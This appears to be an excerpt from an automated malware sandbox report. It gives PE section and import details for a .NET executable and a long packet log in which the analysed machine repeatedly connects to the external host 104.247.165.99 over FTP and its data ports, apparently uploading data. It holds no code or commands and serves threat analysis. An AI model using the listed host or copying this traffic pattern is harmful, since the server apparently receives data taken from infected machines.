| .text | 0x2000 | 0xae340 | 0xae400 | 684f8c108ea454d1c052f1eaa5981ec4 | False | 0.8929578214670014 | data | 7.728445191379543 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ |
| .rsrc | 0xb2000 | 0x60c | 0x800 | 32a5ed829a27fada75f4fd5da9e19b0b | False | 0.333984375 | data | 3.419601708085662 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ |
| .reloc | 0xb4000 | 0xc | 0x200 | edacc63285b9f6a3e9f27589a6069f7f | False | 0.044921875 | data | 0.08153941234324169 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ |
| Name | RVA | Size | Type | Language | Country | ZLIB Complexity |
|---|---|---|---|---|---|---|
| RT_VERSION | 0xb2090 | 0x37c | data | | | 0.4248878923766816 |
| RT_MANIFEST | 0xb241c | 0x1ea | XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators | | | 0.5489795918367347 |
| DLL | Import |
|---|---|
| mscoree.dll | _CorExeMain |
Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                      Oct 3, 2024 09:13:21.441916943 CEST4975050773192.168.2.5104.247.165.99
                                      Oct 3, 2024 09:13:21.441942930 CEST5077349750104.247.165.99192.168.2.5
                                      Oct 3, 2024 09:13:21.441953897 CEST5077349750104.247.165.99192.168.2.5
                                      Oct 3, 2024 09:13:21.441983938 CEST5077349750104.247.165.99192.168.2.5
                                      Oct 3, 2024 09:13:21.441992998 CEST5077349750104.247.165.99192.168.2.5
                                      Oct 3, 2024 09:13:21.442013025 CEST4975050773192.168.2.5104.247.165.99
                                      Oct 3, 2024 09:13:21.446676970 CEST5077349750104.247.165.99192.168.2.5
                                      Oct 3, 2024 09:13:21.446732044 CEST5077349750104.247.165.99192.168.2.5
                                      Oct 3, 2024 09:13:21.446849108 CEST5077349750104.247.165.99192.168.2.5
                                      Oct 3, 2024 09:13:21.446881056 CEST5077349750104.247.165.99192.168.2.5
                                      Oct 3, 2024 09:13:21.447551966 CEST5077349750104.247.165.99192.168.2.5
                                      Oct 3, 2024 09:13:21.447608948 CEST5077349750104.247.165.99192.168.2.5
                                      Oct 3, 2024 09:13:21.447633982 CEST5077349750104.247.165.99192.168.2.5
                                      Oct 3, 2024 09:13:21.447643995 CEST5077349750104.247.165.99192.168.2.5
                                      Oct 3, 2024 09:13:21.447662115 CEST5077349750104.247.165.99192.168.2.5
                                      Oct 3, 2024 09:13:21.447696924 CEST5077349750104.247.165.99192.168.2.5
                                      Oct 3, 2024 09:13:21.447705984 CEST5077349750104.247.165.99192.168.2.5
                                      Oct 3, 2024 09:13:21.447731972 CEST5077349750104.247.165.99192.168.2.5
                                      Oct 3, 2024 09:13:21.447778940 CEST5077349750104.247.165.99192.168.2.5
                                      Oct 3, 2024 09:13:21.447788000 CEST5077349750104.247.165.99192.168.2.5
                                      Oct 3, 2024 09:13:21.447798014 CEST5077349750104.247.165.99192.168.2.5
                                      Oct 3, 2024 09:13:21.447808027 CEST5077349750104.247.165.99192.168.2.5
                                      Oct 3, 2024 09:13:21.447817087 CEST5077349750104.247.165.99192.168.2.5
                                      Oct 3, 2024 09:13:21.448158026 CEST5077349750104.247.165.99192.168.2.5
                                      Oct 3, 2024 09:13:21.448213100 CEST4975050773192.168.2.5104.247.165.99
                                      Oct 3, 2024 09:13:21.590292931 CEST4974621192.168.2.5104.247.165.99
                                      Oct 3, 2024 09:13:21.923731089 CEST2149746104.247.165.99192.168.2.5
                                      Oct 3, 2024 09:13:21.980931997 CEST4974621192.168.2.5104.247.165.99
                                      Oct 3, 2024 09:13:25.048399925 CEST4974621192.168.2.5104.247.165.99
                                      Oct 3, 2024 09:13:25.053246975 CEST2149746104.247.165.99192.168.2.5
                                      Oct 3, 2024 09:13:25.266415119 CEST2149746104.247.165.99192.168.2.5
                                      Oct 3, 2024 09:13:25.266824007 CEST4975160182192.168.2.5104.247.165.99
                                      Oct 3, 2024 09:13:25.271759033 CEST6018249751104.247.165.99192.168.2.5
                                      Oct 3, 2024 09:13:25.271823883 CEST4975160182192.168.2.5104.247.165.99
                                      Oct 3, 2024 09:13:25.271961927 CEST4974621192.168.2.5104.247.165.99
                                      Oct 3, 2024 09:13:25.276750088 CEST2149746104.247.165.99192.168.2.5
                                      Oct 3, 2024 09:13:25.932480097 CEST2149746104.247.165.99192.168.2.5
                                      Oct 3, 2024 09:13:25.933824062 CEST4975160182192.168.2.5104.247.165.99
                                      Oct 3, 2024 09:13:25.942157030 CEST6018249751104.247.165.99192.168.2.5
                                      Oct 3, 2024 09:13:25.942169905 CEST6018249751104.247.165.99192.168.2.5
                                      Oct 3, 2024 09:13:25.942178965 CEST6018249751104.247.165.99192.168.2.5
                                      Oct 3, 2024 09:13:25.942183018 CEST6018249751104.247.165.99192.168.2.5
                                      Oct 3, 2024 09:13:25.942190886 CEST6018249751104.247.165.99192.168.2.5
                                      Oct 3, 2024 09:13:25.942200899 CEST6018249751104.247.165.99192.168.2.5
                                      Oct 3, 2024 09:13:25.942209005 CEST6018249751104.247.165.99192.168.2.5
                                      Oct 3, 2024 09:13:25.942226887 CEST4975160182192.168.2.5104.247.165.99
                                      Oct 3, 2024 09:13:25.942270994 CEST4975160182192.168.2.5104.247.165.99
                                      Oct 3, 2024 09:13:25.942431927 CEST6018249751104.247.165.99192.168.2.5
                                      Oct 3, 2024 09:13:25.942441940 CEST6018249751104.247.165.99192.168.2.5
                                      Oct 3, 2024 09:13:25.942451000 CEST6018249751104.247.165.99192.168.2.5
                                      Oct 3, 2024 09:13:25.942490101 CEST4975160182192.168.2.5104.247.165.99
                                      Oct 3, 2024 09:13:25.950092077 CEST6018249751104.247.165.99192.168.2.5
                                      Oct 3, 2024 09:13:25.950102091 CEST6018249751104.247.165.99192.168.2.5
                                      Oct 3, 2024 09:13:25.950109959 CEST6018249751104.247.165.99192.168.2.5
                                      Oct 3, 2024 09:13:25.950119019 CEST6018249751104.247.165.99192.168.2.5
                                      Oct 3, 2024 09:13:25.950122118 CEST6018249751104.247.165.99192.168.2.5
                                      Oct 3, 2024 09:13:25.950125933 CEST6018249751104.247.165.99192.168.2.5
                                      Oct 3, 2024 09:13:25.950189114 CEST4975160182192.168.2.5104.247.165.99
                                      Oct 3, 2024 09:13:25.951222897 CEST6018249751104.247.165.99192.168.2.5
                                      Oct 3, 2024 09:13:25.951232910 CEST6018249751104.247.165.99192.168.2.5
                                      Oct 3, 2024 09:13:25.951241970 CEST6018249751104.247.165.99192.168.2.5
                                      Oct 3, 2024 09:13:25.951245070 CEST6018249751104.247.165.99192.168.2.5
                                      Oct 3, 2024 09:13:25.951248884 CEST6018249751104.247.165.99192.168.2.5
                                      Oct 3, 2024 09:13:25.951272011 CEST4975160182192.168.2.5104.247.165.99
                                      Oct 3, 2024 09:13:25.951325893 CEST4975160182192.168.2.5104.247.165.99
                                      Oct 3, 2024 09:13:25.957278013 CEST6018249751104.247.165.99192.168.2.5
                                      Oct 3, 2024 09:13:25.957288980 CEST6018249751104.247.165.99192.168.2.5
                                      Oct 3, 2024 09:13:25.957297087 CEST6018249751104.247.165.99192.168.2.5
                                      Oct 3, 2024 09:13:25.957305908 CEST6018249751104.247.165.99192.168.2.5
                                      Oct 3, 2024 09:13:25.957314968 CEST6018249751104.247.165.99192.168.2.5
                                      Oct 3, 2024 09:13:25.957324028 CEST6018249751104.247.165.99192.168.2.5
                                      Oct 3, 2024 09:13:25.957333088 CEST6018249751104.247.165.99192.168.2.5
                                      Oct 3, 2024 09:13:25.957340956 CEST6018249751104.247.165.99192.168.2.5
                                      Oct 3, 2024 09:13:25.957350016 CEST6018249751104.247.165.99192.168.2.5
                                      Oct 3, 2024 09:13:25.957357883 CEST6018249751104.247.165.99192.168.2.5
                                      Oct 3, 2024 09:13:25.957367897 CEST6018249751104.247.165.99192.168.2.5
                                      Oct 3, 2024 09:13:25.957583904 CEST6018249751104.247.165.99192.168.2.5
                                      Oct 3, 2024 09:13:25.957595110 CEST6018249751104.247.165.99192.168.2.5
                                      Oct 3, 2024 09:13:25.957603931 CEST6018249751104.247.165.99192.168.2.5
                                      Oct 3, 2024 09:13:25.957614899 CEST6018249751104.247.165.99192.168.2.5
                                      Oct 3, 2024 09:13:25.957806110 CEST6018249751104.247.165.99192.168.2.5
                                      Oct 3, 2024 09:13:25.957814932 CEST6018249751104.247.165.99192.168.2.5
                                      Oct 3, 2024 09:13:25.957823992 CEST6018249751104.247.165.99192.168.2.5
                                      Oct 3, 2024 09:13:25.957832098 CEST6018249751104.247.165.99192.168.2.5
                                      Oct 3, 2024 09:13:25.957840919 CEST6018249751104.247.165.99192.168.2.5
                                      Oct 3, 2024 09:13:25.957849026 CEST6018249751104.247.165.99192.168.2.5
                                      Oct 3, 2024 09:13:25.957858086 CEST6018249751104.247.165.99192.168.2.5
                                      Oct 3, 2024 09:13:25.957918882 CEST4975160182192.168.2.5104.247.165.99
                                      Oct 3, 2024 09:13:25.982042074 CEST4974621192.168.2.5104.247.165.99
                                      Oct 3, 2024 09:13:26.427440882 CEST2149746104.247.165.99192.168.2.5
                                      Oct 3, 2024 09:13:26.480937004 CEST4974621192.168.2.5104.247.165.99
                                      Oct 3, 2024 09:13:27.314317942 CEST4974621192.168.2.5104.247.165.99
                                      Oct 3, 2024 09:13:27.319236994 CEST2149746104.247.165.99192.168.2.5
                                      Oct 3, 2024 09:13:27.532078981 CEST2149746104.247.165.99192.168.2.5
                                      Oct 3, 2024 09:13:27.532481909 CEST4975249744192.168.2.5104.247.165.99
                                      Oct 3, 2024 09:13:27.537334919 CEST4974449752104.247.165.99192.168.2.5
                                      Oct 3, 2024 09:13:27.537517071 CEST4975249744192.168.2.5104.247.165.99
                                      Oct 3, 2024 09:13:27.537539005 CEST4974621192.168.2.5104.247.165.99
                                      Oct 3, 2024 09:13:27.542768002 CEST2149746104.247.165.99192.168.2.5
                                      Oct 3, 2024 09:13:28.134341002 CEST2149746104.247.165.99192.168.2.5
                                      Oct 3, 2024 09:13:28.134675026 CEST4975249744192.168.2.5104.247.165.99
                                      Oct 3, 2024 09:13:28.139692068 CEST4974449752104.247.165.99192.168.2.5
                                      Oct 3, 2024 09:13:28.139734030 CEST4975249744192.168.2.5104.247.165.99
                                      Oct 3, 2024 09:13:28.139813900 CEST4974449752104.247.165.99192.168.2.5
                                      Oct 3, 2024 09:13:28.139823914 CEST4974449752104.247.165.99192.168.2.5
                                      Oct 3, 2024 09:13:28.139885902 CEST4975249744192.168.2.5104.247.165.99
                                      Oct 3, 2024 09:13:28.140099049 CEST4974449752104.247.165.99192.168.2.5
                                      Oct 3, 2024 09:13:28.140109062 CEST4974449752104.247.165.99192.168.2.5
                                      Oct 3, 2024 09:13:28.140117884 CEST4974449752104.247.165.99192.168.2.5
                                      Oct 3, 2024 09:13:28.140127897 CEST4974449752104.247.165.99192.168.2.5
                                      Oct 3, 2024 09:13:28.140136003 CEST4974449752104.247.165.99192.168.2.5
                                      Oct 3, 2024 09:13:28.140145063 CEST4974449752104.247.165.99192.168.2.5
                                      Oct 3, 2024 09:13:28.140152931 CEST4974449752104.247.165.99192.168.2.5
                                      Oct 3, 2024 09:13:28.140161991 CEST4975249744192.168.2.5104.247.165.99
                                      Oct 3, 2024 09:13:28.140196085 CEST4975249744192.168.2.5104.247.165.99
                                      Oct 3, 2024 09:13:28.144524097 CEST4974449752104.247.165.99192.168.2.5
                                      Oct 3, 2024 09:13:28.144639015 CEST4975249744192.168.2.5104.247.165.99
                                      Oct 3, 2024 09:13:28.144645929 CEST4974449752104.247.165.99192.168.2.5
                                      Oct 3, 2024 09:13:28.144674063 CEST4974449752104.247.165.99192.168.2.5
                                      Oct 3, 2024 09:13:28.144681931 CEST4975249744192.168.2.5104.247.165.99
                                      Oct 3, 2024 09:13:28.144702911 CEST4975249744192.168.2.5104.247.165.99
                                      Oct 3, 2024 09:13:28.144907951 CEST4974449752104.247.165.99192.168.2.5
                                      Oct 3, 2024 09:13:28.144917965 CEST4974449752104.247.165.99192.168.2.5
                                      Oct 3, 2024 09:13:28.144927025 CEST4974449752104.247.165.99192.168.2.5
                                      Oct 3, 2024 09:13:28.144959927 CEST4975249744192.168.2.5104.247.165.99
                                      Oct 3, 2024 09:13:28.144975901 CEST4975249744192.168.2.5104.247.165.99
                                      Oct 3, 2024 09:13:28.149282932 CEST4974449752104.247.165.99192.168.2.5
                                      Oct 3, 2024 09:13:28.149292946 CEST4974449752104.247.165.99192.168.2.5
                                      Oct 3, 2024 09:13:28.149302006 CEST4974449752104.247.165.99192.168.2.5
                                      Oct 3, 2024 09:13:28.149312019 CEST4974449752104.247.165.99192.168.2.5
                                      Oct 3, 2024 09:13:28.149321079 CEST4974449752104.247.165.99192.168.2.5
                                      Oct 3, 2024 09:13:28.149329901 CEST4974449752104.247.165.99192.168.2.5
                                      Oct 3, 2024 09:13:28.149338961 CEST4975249744192.168.2.5104.247.165.99
                                      Oct 3, 2024 09:13:28.149372101 CEST4975249744192.168.2.5104.247.165.99
                                      Oct 3, 2024 09:13:28.149410009 CEST4974449752104.247.165.99192.168.2.5
                                      Oct 3, 2024 09:13:28.149488926 CEST4974449752104.247.165.99192.168.2.5
                                      Oct 3, 2024 09:13:28.149749994 CEST4974449752104.247.165.99192.168.2.5
                                      Oct 3, 2024 09:13:28.154170990 CEST4974449752104.247.165.99192.168.2.5
                                      Oct 3, 2024 09:13:28.154181957 CEST4974449752104.247.165.99192.168.2.5
                                      Oct 3, 2024 09:13:28.154191017 CEST4974449752104.247.165.99192.168.2.5
                                      Oct 3, 2024 09:13:28.164268017 CEST4974449752104.247.165.99192.168.2.5
                                      Oct 3, 2024 09:13:28.164282084 CEST4974449752104.247.165.99192.168.2.5
                                      Oct 3, 2024 09:13:28.164290905 CEST4974449752104.247.165.99192.168.2.5
                                      Oct 3, 2024 09:13:28.164294004 CEST4974449752104.247.165.99192.168.2.5
                                      Oct 3, 2024 09:13:28.164299011 CEST4974449752104.247.165.99192.168.2.5
                                      Oct 3, 2024 09:13:28.164310932 CEST4974449752104.247.165.99192.168.2.5
                                      Oct 3, 2024 09:13:28.164320946 CEST4974449752104.247.165.99192.168.2.5
                                      Oct 3, 2024 09:13:28.164335966 CEST4974449752104.247.165.99192.168.2.5
                                      Oct 3, 2024 09:13:28.164346933 CEST4974449752104.247.165.99192.168.2.5
                                      Oct 3, 2024 09:13:28.164994001 CEST4974449752104.247.165.99192.168.2.5
                                      Oct 3, 2024 09:13:28.165005922 CEST4974449752104.247.165.99192.168.2.5
                                      Oct 3, 2024 09:13:28.165014982 CEST4974449752104.247.165.99192.168.2.5
                                      Oct 3, 2024 09:13:28.165024996 CEST4974449752104.247.165.99192.168.2.5
                                      Oct 3, 2024 09:13:28.165076971 CEST4975249744192.168.2.5104.247.165.99
                                      Oct 3, 2024 09:13:28.184036970 CEST4974621192.168.2.5104.247.165.99
                                      Oct 3, 2024 09:13:28.594593048 CEST2149746104.247.165.99192.168.2.5
                                      Oct 3, 2024 09:13:28.637181044 CEST4974621192.168.2.5104.247.165.99
                                      Oct 3, 2024 09:13:33.282485962 CEST4974621192.168.2.5104.247.165.99
                                      Oct 3, 2024 09:13:33.439296961 CEST2149746104.247.165.99192.168.2.5
                                      Oct 3, 2024 09:13:33.653872013 CEST2149746104.247.165.99192.168.2.5
                                      Oct 3, 2024 09:13:33.654572964 CEST4975359991192.168.2.5104.247.165.99
                                      Oct 3, 2024 09:13:33.662679911 CEST5999149753104.247.165.99192.168.2.5
                                      Oct 3, 2024 09:13:33.662751913 CEST4975359991192.168.2.5104.247.165.99
                                      Oct 3, 2024 09:13:33.662830114 CEST4974621192.168.2.5104.247.165.99
                                      Oct 3, 2024 09:13:33.670684099 CEST2149746104.247.165.99192.168.2.5
                                      Oct 3, 2024 09:13:34.317076921 CEST2149746104.247.165.99192.168.2.5
                                      Oct 3, 2024 09:13:34.317307949 CEST4975359991192.168.2.5104.247.165.99
                                      Oct 3, 2024 09:13:34.322846889 CEST5999149753104.247.165.99192.168.2.5
                                      Oct 3, 2024 09:13:34.322856903 CEST5999149753104.247.165.99192.168.2.5
                                      Oct 3, 2024 09:13:34.322868109 CEST5999149753104.247.165.99192.168.2.5
                                      Oct 3, 2024 09:13:34.323420048 CEST5999149753104.247.165.99192.168.2.5
                                      Oct 3, 2024 09:13:34.323429108 CEST5999149753104.247.165.99192.168.2.5
                                      Oct 3, 2024 09:13:34.323437929 CEST5999149753104.247.165.99192.168.2.5
                                      Oct 3, 2024 09:13:34.323446989 CEST5999149753104.247.165.99192.168.2.5
                                      Oct 3, 2024 09:13:34.323455095 CEST5999149753104.247.165.99192.168.2.5
                                      Oct 3, 2024 09:13:34.323456049 CEST4975359991192.168.2.5104.247.165.99
                                      Oct 3, 2024 09:13:34.323519945 CEST5999149753104.247.165.99192.168.2.5
                                      Oct 3, 2024 09:13:34.323529959 CEST5999149753104.247.165.99192.168.2.5
                                      Oct 3, 2024 09:13:34.323542118 CEST4975359991192.168.2.5104.247.165.99
                                      Oct 3, 2024 09:13:34.323622942 CEST4975359991192.168.2.5104.247.165.99
                                      Oct 3, 2024 09:13:34.328499079 CEST5999149753104.247.165.99192.168.2.5
                                      Oct 3, 2024 09:13:34.328509092 CEST5999149753104.247.165.99192.168.2.5
                                      Oct 3, 2024 09:13:34.328516960 CEST5999149753104.247.165.99192.168.2.5
                                      Oct 3, 2024 09:13:34.328751087 CEST5999149753104.247.165.99192.168.2.5
                                      Oct 3, 2024 09:13:34.328783035 CEST4975359991192.168.2.5104.247.165.99
                                      Oct 3, 2024 09:13:34.328861952 CEST5999149753104.247.165.99192.168.2.5
                                      Oct 3, 2024 09:13:34.328871012 CEST5999149753104.247.165.99192.168.2.5
                                      Oct 3, 2024 09:13:34.328886986 CEST4975359991192.168.2.5104.247.165.99
                                      Oct 3, 2024 09:13:34.328964949 CEST4975359991192.168.2.5104.247.165.99
                                      Oct 3, 2024 09:13:34.331235886 CEST5999149753104.247.165.99192.168.2.5
                                      Oct 3, 2024 09:13:34.331703901 CEST4975359991192.168.2.5104.247.165.99
                                      Oct 3, 2024 09:13:34.335576057 CEST5999149753104.247.165.99192.168.2.5
                                      Oct 3, 2024 09:13:34.337330103 CEST5999149753104.247.165.99192.168.2.5
                                      Oct 3, 2024 09:13:34.337338924 CEST5999149753104.247.165.99192.168.2.5
                                      Oct 3, 2024 09:13:34.337347984 CEST5999149753104.247.165.99192.168.2.5
                                      Oct 3, 2024 09:13:34.337584019 CEST5999149753104.247.165.99192.168.2.5
                                      Oct 3, 2024 09:13:34.337594986 CEST5999149753104.247.165.99192.168.2.5
                                      Oct 3, 2024 09:13:34.337603092 CEST5999149753104.247.165.99192.168.2.5
                                      Oct 3, 2024 09:13:34.337610960 CEST5999149753104.247.165.99192.168.2.5
                                      Oct 3, 2024 09:13:34.337620020 CEST5999149753104.247.165.99192.168.2.5
                                      Oct 3, 2024 09:13:34.339523077 CEST5999149753104.247.165.99192.168.2.5
                                      Oct 3, 2024 09:13:34.340044975 CEST4975359991192.168.2.5104.247.165.99
                                      Oct 3, 2024 09:13:34.371556044 CEST4974621192.168.2.5104.247.165.99
                                      Oct 3, 2024 09:13:34.809006929 CEST2149746104.247.165.99192.168.2.5
                                      Oct 3, 2024 09:13:34.855897903 CEST4974621192.168.2.5104.247.165.99
                                      Oct 3, 2024 09:13:35.776626110 CEST4974621192.168.2.5104.247.165.99
                                      Oct 3, 2024 09:13:35.798456907 CEST2149746104.247.165.99192.168.2.5
                                      Oct 3, 2024 09:13:35.880237103 CEST4975421192.168.2.5104.247.165.99
                                      Oct 3, 2024 09:13:35.885603905 CEST2149754104.247.165.99192.168.2.5
                                      Oct 3, 2024 09:13:35.885665894 CEST4975421192.168.2.5104.247.165.99
                                      Oct 3, 2024 09:13:36.041918039 CEST2149746104.247.165.99192.168.2.5
                                      Oct 3, 2024 09:13:36.042345047 CEST4975561434192.168.2.5104.247.165.99
                                      Oct 3, 2024 09:13:36.057286024 CEST6143449755104.247.165.99192.168.2.5
                                      Oct 3, 2024 09:13:36.057363033 CEST4975561434192.168.2.5104.247.165.99
                                      Oct 3, 2024 09:13:36.057435036 CEST4974621192.168.2.5104.247.165.99
                                      Oct 3, 2024 09:13:36.065145016 CEST2149746104.247.165.99192.168.2.5
                                      Oct 3, 2024 09:13:36.617619991 CEST2149754104.247.165.99192.168.2.5
                                      Oct 3, 2024 09:13:36.618010998 CEST4975421192.168.2.5104.247.165.99
                                      Oct 3, 2024 09:13:36.625228882 CEST2149754104.247.165.99192.168.2.5
                                      Oct 3, 2024 09:13:36.690882921 CEST2149746104.247.165.99192.168.2.5
                                      Oct 3, 2024 09:13:36.691113949 CEST4975561434192.168.2.5104.247.165.99
                                      Oct 3, 2024 09:13:36.723073959 CEST6143449755104.247.165.99192.168.2.5
                                      Oct 3, 2024 09:13:36.723392010 CEST6143449755104.247.165.99192.168.2.5
                                      Oct 3, 2024 09:13:36.723434925 CEST6143449755104.247.165.99192.168.2.5
                                      Oct 3, 2024 09:13:36.723447084 CEST6143449755104.247.165.99192.168.2.5
                                      Oct 3, 2024 09:13:36.723457098 CEST6143449755104.247.165.99192.168.2.5
                                      Oct 3, 2024 09:13:36.723460913 CEST6143449755104.247.165.99192.168.2.5
                                      Oct 3, 2024 09:13:36.723639011 CEST4975561434192.168.2.5104.247.165.99
                                      Oct 3, 2024 09:13:36.726763964 CEST6143449755104.247.165.99192.168.2.5
                                      Oct 3, 2024 09:13:36.726773977 CEST6143449755104.247.165.99192.168.2.5
                                      Oct 3, 2024 09:13:36.726783037 CEST6143449755104.247.165.99192.168.2.5
                                      Oct 3, 2024 09:13:36.726787090 CEST6143449755104.247.165.99192.168.2.5
                                      Oct 3, 2024 09:13:36.726933002 CEST4975561434192.168.2.5104.247.165.99
                                      Oct 3, 2024 09:13:36.730897903 CEST4974621192.168.2.5104.247.165.99
                                      Oct 3, 2024 09:13:36.739954948 CEST6143449755104.247.165.99192.168.2.5
                                      Oct 3, 2024 09:13:36.739968061 CEST6143449755104.247.165.99192.168.2.5
                                      Oct 3, 2024 09:13:36.739975929 CEST6143449755104.247.165.99192.168.2.5
                                      Oct 3, 2024 09:13:36.740137100 CEST6143449755104.247.165.99192.168.2.5
                                      Oct 3, 2024 09:13:36.740145922 CEST6143449755104.247.165.99192.168.2.5
                                      Oct 3, 2024 09:13:36.740154982 CEST6143449755104.247.165.99192.168.2.5
                                      Oct 3, 2024 09:13:36.740200043 CEST4975561434192.168.2.5104.247.165.99
                                      Oct 3, 2024 09:13:36.740245104 CEST4975561434192.168.2.5104.247.165.99
                                      Oct 3, 2024 09:13:36.740987062 CEST6143449755104.247.165.99192.168.2.5
                                      Oct 3, 2024 09:13:36.740998030 CEST6143449755104.247.165.99192.168.2.5
                                      Oct 3, 2024 09:13:36.741336107 CEST6143449755104.247.165.99192.168.2.5
                                      Oct 3, 2024 09:13:36.741466045 CEST4975561434192.168.2.5104.247.165.99
                                      Oct 3, 2024 09:13:36.741904020 CEST6143449755104.247.165.99192.168.2.5
                                      Oct 3, 2024 09:13:36.743628025 CEST4975561434192.168.2.5104.247.165.99
                                      Oct 3, 2024 09:13:36.750085115 CEST6143449755104.247.165.99192.168.2.5
                                      Oct 3, 2024 09:13:36.750096083 CEST6143449755104.247.165.99192.168.2.5
                                      Oct 3, 2024 09:13:36.750103951 CEST6143449755104.247.165.99192.168.2.5
                                      Oct 3, 2024 09:13:36.750335932 CEST4975561434192.168.2.5104.247.165.99
                                      Oct 3, 2024 09:13:36.750605106 CEST6143449755104.247.165.99192.168.2.5
                                      Oct 3, 2024 09:13:36.750614882 CEST6143449755104.247.165.99192.168.2.5
                                      Oct 3, 2024 09:13:36.750624895 CEST6143449755104.247.165.99192.168.2.5
                                      Oct 3, 2024 09:13:36.750628948 CEST6143449755104.247.165.99192.168.2.5
                                      Oct 3, 2024 09:13:36.750637054 CEST6143449755104.247.165.99192.168.2.5
                                      Oct 3, 2024 09:14:59.950937033 CEST2149746104.247.165.99192.168.2.5
                                      Oct 3, 2024 09:15:01.139504910 CEST2149746104.247.165.99192.168.2.5
                                      Oct 3, 2024 09:15:01.139533997 CEST2149746104.247.165.99192.168.2.5
                                      Oct 3, 2024 09:15:01.139715910 CEST2149746104.247.165.99192.168.2.5
                                      Oct 3, 2024 09:15:01.139765024 CEST4974621192.168.2.5104.247.165.99
                                      Oct 3, 2024 09:15:01.139765024 CEST4974621192.168.2.5104.247.165.99
                                      Oct 3, 2024 09:15:01.139782906 CEST4976461673192.168.2.5104.247.165.99
                                      Oct 3, 2024 09:15:01.144807100 CEST6167349764104.247.165.99192.168.2.5
                                      Oct 3, 2024 09:15:01.144892931 CEST4976461673192.168.2.5104.247.165.99
                                      Oct 3, 2024 09:15:01.145104885 CEST6167349764104.247.165.99192.168.2.5
                                      Oct 3, 2024 09:15:01.145114899 CEST6167349764104.247.165.99192.168.2.5
                                      Oct 3, 2024 09:15:01.145132065 CEST6167349764104.247.165.99192.168.2.5
                                      Oct 3, 2024 09:15:01.145140886 CEST6167349764104.247.165.99192.168.2.5
                                      Oct 3, 2024 09:15:01.145149946 CEST6167349764104.247.165.99192.168.2.5
                                      Oct 3, 2024 09:15:01.145159960 CEST6167349764104.247.165.99192.168.2.5
                                      Oct 3, 2024 09:15:01.145163059 CEST6167349764104.247.165.99192.168.2.5
                                      Oct 3, 2024 09:15:01.145165920 CEST4976461673192.168.2.5104.247.165.99
                                      Oct 3, 2024 09:15:01.145176888 CEST6167349764104.247.165.99192.168.2.5
                                      Oct 3, 2024 09:15:01.145196915 CEST4976461673192.168.2.5104.247.165.99
                                      Oct 3, 2024 09:15:01.145278931 CEST4976461673192.168.2.5104.247.165.99
                                      Oct 3, 2024 09:15:01.149396896 CEST6167349764104.247.165.99192.168.2.5
                                      Oct 3, 2024 09:15:01.149468899 CEST4976461673192.168.2.5104.247.165.99
                                      Oct 3, 2024 09:15:01.149701118 CEST6167349764104.247.165.99192.168.2.5
                                      Oct 3, 2024 09:15:01.149801016 CEST4976461673192.168.2.5104.247.165.99
                                      Oct 3, 2024 09:15:01.149914026 CEST6167349764104.247.165.99192.168.2.5
                                      Oct 3, 2024 09:15:01.150022030 CEST4976461673192.168.2.5104.247.165.99
                                      Oct 3, 2024 09:15:01.151421070 CEST6167349764104.247.165.99192.168.2.5
                                      Oct 3, 2024 09:15:01.151463985 CEST6167349764104.247.165.99192.168.2.5
                                      Oct 3, 2024 09:15:01.151495934 CEST6167349764104.247.165.99192.168.2.5
                                      Oct 3, 2024 09:15:01.151505947 CEST6167349764104.247.165.99192.168.2.5
                                      Oct 3, 2024 09:15:01.151515961 CEST6167349764104.247.165.99192.168.2.5
                                      Oct 3, 2024 09:15:01.151566029 CEST6167349764104.247.165.99192.168.2.5
                                      Oct 3, 2024 09:15:01.151639938 CEST4976461673192.168.2.5104.247.165.99
                                      Oct 3, 2024 09:15:01.154443026 CEST6167349764104.247.165.99192.168.2.5
                                      Oct 3, 2024 09:15:01.155107975 CEST6167349764104.247.165.99192.168.2.5
                                      Oct 3, 2024 09:15:01.156488895 CEST6167349764104.247.165.99192.168.2.5
                                      Oct 3, 2024 09:15:01.156502008 CEST6167349764104.247.165.99192.168.2.5
                                      Oct 3, 2024 09:15:01.156573057 CEST6167349764104.247.165.99192.168.2.5
                                      Oct 3, 2024 09:15:01.156642914 CEST6167349764104.247.165.99192.168.2.5
                                      Oct 3, 2024 09:15:01.156655073 CEST6167349764104.247.165.99192.168.2.5
                                      Oct 3, 2024 09:15:01.156701088 CEST6167349764104.247.165.99192.168.2.5
                                      Oct 3, 2024 09:15:01.156709909 CEST6167349764104.247.165.99192.168.2.5
                                      Oct 3, 2024 09:15:01.156785011 CEST6167349764104.247.165.99192.168.2.5
                                      Oct 3, 2024 09:15:01.156795025 CEST6167349764104.247.165.99192.168.2.5
                                      Oct 3, 2024 09:15:01.156804085 CEST6167349764104.247.165.99192.168.2.5
                                      Oct 3, 2024 09:15:01.156814098 CEST6167349764104.247.165.99192.168.2.5
                                      Oct 3, 2024 09:15:01.156822920 CEST6167349764104.247.165.99192.168.2.5
                                      Oct 3, 2024 09:15:01.156878948 CEST6167349764104.247.165.99192.168.2.5
                                      Oct 3, 2024 09:15:01.156887054 CEST6167349764104.247.165.99192.168.2.5
                                      Oct 3, 2024 09:15:01.156896114 CEST6167349764104.247.165.99192.168.2.5
                                      Oct 3, 2024 09:15:01.157099009 CEST6167349764104.247.165.99192.168.2.5
                                      Oct 3, 2024 09:15:01.157532930 CEST4976461673192.168.2.5104.247.165.99
                                      Oct 3, 2024 09:15:01.625895977 CEST2149746104.247.165.99192.168.2.5
                                      Oct 3, 2024 09:15:01.668257952 CEST4974621192.168.2.5104.247.165.99
                                      Oct 3, 2024 09:15:16.163206100 CEST4974621192.168.2.5104.247.165.99
                                      Oct 3, 2024 09:15:16.168112040 CEST2149746104.247.165.99192.168.2.5
                                      Oct 3, 2024 09:15:16.381231070 CEST2149746104.247.165.99192.168.2.5
                                      Oct 3, 2024 09:15:16.381647110 CEST4976553275192.168.2.5104.247.165.99
                                      Oct 3, 2024 09:15:16.386538982 CEST5327549765104.247.165.99192.168.2.5
                                      Oct 3, 2024 09:15:16.386603117 CEST4976553275192.168.2.5104.247.165.99
                                      Oct 3, 2024 09:15:16.386667967 CEST4974621192.168.2.5104.247.165.99
                                      Oct 3, 2024 09:15:16.391504049 CEST2149746104.247.165.99192.168.2.5
                                      Oct 3, 2024 09:15:17.010523081 CEST2149746104.247.165.99192.168.2.5
